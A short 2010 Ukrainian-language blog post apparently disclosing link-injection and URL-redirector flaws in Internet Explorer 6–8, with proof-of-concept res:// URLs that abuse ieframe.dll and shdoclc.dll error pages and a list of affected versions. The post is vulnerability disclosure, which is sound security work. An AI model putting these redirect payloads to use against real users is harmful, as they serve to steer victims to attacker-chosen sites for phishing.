Link Injection та Redirector уразливості в Internet Explorer
23:52 23.08.2010Нещодавно, 20.08.2010, я виявив Link Injection та Redirector (URL Redirector Abuse) уразливості в різних версіях Microsoft Internet Explorer. Так що, як видно з мого дослідження, до Link Injection та Redirector уразливі не тільки веб додатки, але й браузери.
Link Injection (в IE8):
res://ieframe.dll/acr_error.htm#Site,http://site.com
Redirector:
В IE7 та IE8:
res://ieframe.dll/http_404.htm#http://websecurity.com.ua
В IE6, IE7 та IE8:
res://c:\windows\system32\shdoclc.dll/http_404.htm#http://websecurity.com.ua
res://shdoclc.dll/http_404.htm#http://websecurity.com.ua
res://c:\windows\system32\shdoclc.dll/syntax.htm#http://websecurity.com.ua
res://shdoclc.dll/syntax.htm#http://websecurity.com.ua
В даних Redirector уразливостях потрібно буде після переходу по лінці (у всіх зазначених браузерах) натиснути F5 чи клікнути на кнопку Refresh для редирекції на заданий сайт. Тому що браузер змінює адресу в адресному рядку на вказаний URL, але не переходить на нього, тому йому потрібно допомогти .
Уразливі версії Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) та попередні версії.